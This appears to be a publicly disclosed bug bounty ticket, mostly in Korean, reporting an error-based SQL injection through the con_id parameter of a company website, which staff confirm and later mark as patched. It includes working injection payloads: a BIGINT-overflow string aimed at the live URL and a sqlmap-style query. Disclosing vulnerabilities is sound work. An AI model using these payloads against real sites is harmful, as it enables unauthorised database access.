SQL injection attacks cause an overflow error BIGINT

작성자 grooveshark 프로그램 수산아이앤티

WEB 종료됨 매우높음 보상없음 작성일: 2021년 10월 27일 (3년 전) 마지막 업데이트일: 2021년 12월 30일 (2년 전)

취약점 유형

SQL injection attacks cause an overflow error BIGINT

상세내용

개요

SQL Injection

재현 과정

[취약점 재현을 하기 위한 과정을 서술해 주세요]
https://www.soosanint.com/contents.php?con_id=%27%20OR%20(select(!x-~0)from(select(selectuser())x)a)–%20-

취약한 파라미터)
con_id

삽입한 쿼리)
’ AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7178717071,(SELECT (ELT(3480=3480,1))),0x716a767871,0x78))s), 8446744073709551610, 8446744073709551610)))-- pgkD -
%27%20OR%20(select(!x-~0)from(select(selectuser())x)a)–%20-

  1. [step2]
  2. [step3]

예상되는 취약점 발생 원인

SQL 쿼리 실행

패치 방법

특수문자 필터링 및 prepared statement 적용

예상 결과 및 파급력

SQL 쿼리 실행

기타사항 및 레퍼런스

Description
Description

타임라인

grooveshark 님이 티켓을 제출했습니다. 2021년 10월 27일 (3년 전)
grooveshark 님이 댓글을 남겼습니다. 2021년 10월 31일 (3년 전)

URL)
https://www.soosanint.com/contents.php?con_id=%27%20OR%20(select(!x-~0)from(select(selectuser())x)a)–±

Dona BUGCAMP STAFF 님이 상태를 '제출됨'에서 '처리중'으로 변경했습니다. 2021년 11월 11일 (2년 전)
Steve BUGCAMP STAFF 님이 댓글을 남겼습니다. 2021년 11월 12일 (2년 전)

안녕하세요. 제보자님
수산아이앤티 버그바운티 프로그램에 제보해주셔서 감사합니다.

제출해주신 티켓은 유효한 티켓으로 Error based SQL Injection 취약점이 발현되는 것을 확인하였습니다. 해당 티켓은 담당자에게 전달될 예정이며, 담당자 업무 일정으로 인해 패치가 지연될 수 있는점 참고부탁드립니다.

감사합니다.

Steve BUGCAMP STAFF 님이 상태를 '처리중'에서 '종료됨'으로 변경했습니다. 2021년 12월 30일 (2년 전)

안녕하세요. 제보자님 제보해주신 SQL injection 취약점이 패치되었습니다. 수산아이앤티 버그바운티 프로그램에 참여해주셔서 감사합니다.

Steve BUGCAMP STAFF 님이 공개상태를 '비공개'에서 '전체공개'로 변경했습니다. 2021년 12월 30일 (2년 전)